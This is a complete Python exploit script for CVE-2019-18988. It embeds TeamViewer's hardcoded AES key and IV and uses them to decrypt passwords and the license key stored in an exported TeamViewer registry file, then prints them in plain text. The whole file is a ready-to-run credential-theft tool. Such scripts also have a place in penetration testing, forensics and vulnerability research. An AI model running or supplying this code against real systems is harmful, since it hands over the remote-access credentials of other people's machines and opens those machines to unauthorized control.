tvd.py

#!/usr/bin/env python3
# Decrypt Teamviewer Passwords from exported registry file
# Usage: python tvd.py Teamviewer_Settings.reg
# Modified by readmeexe
#
# CVE-2019-18988
# Original Author @whynotsecurity
# https://whynotsecurity.com/blog/teamviewer/

import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
passwords = ["OptionsPasswordAES","SecurityPasswordAES","SecurityPasswordExported","ServerPasswordAES","ProxyPasswordAES","LicenseKeyAES"]

def decrypt(key,iv,cipher):
    try:
        ciphertext = binascii.unhexlify(cipher)
        raw_un = AESCipher(key).decrypt(iv, ciphertext)
        password = raw_un.decode('utf-16')
        if password != '':
            return password
        else:
            return('ERROR')
    except:
        return('ERROR')


if len(sys.argv) != 2:
    print('Usage: python tvd.py Teamviewer_Settings.reg')
else:
    filename = sys.argv[1]
    with open(filename) as f:
        content = f.readlines()
        content = [x.strip() for x in content] 

    for line in content:
        for password in passwords:
            if password in line:
                encryptedPassword = line.split(':')[1].replace(',', '')
                print(password,": ",decrypt(key,iv,encryptedPassword) )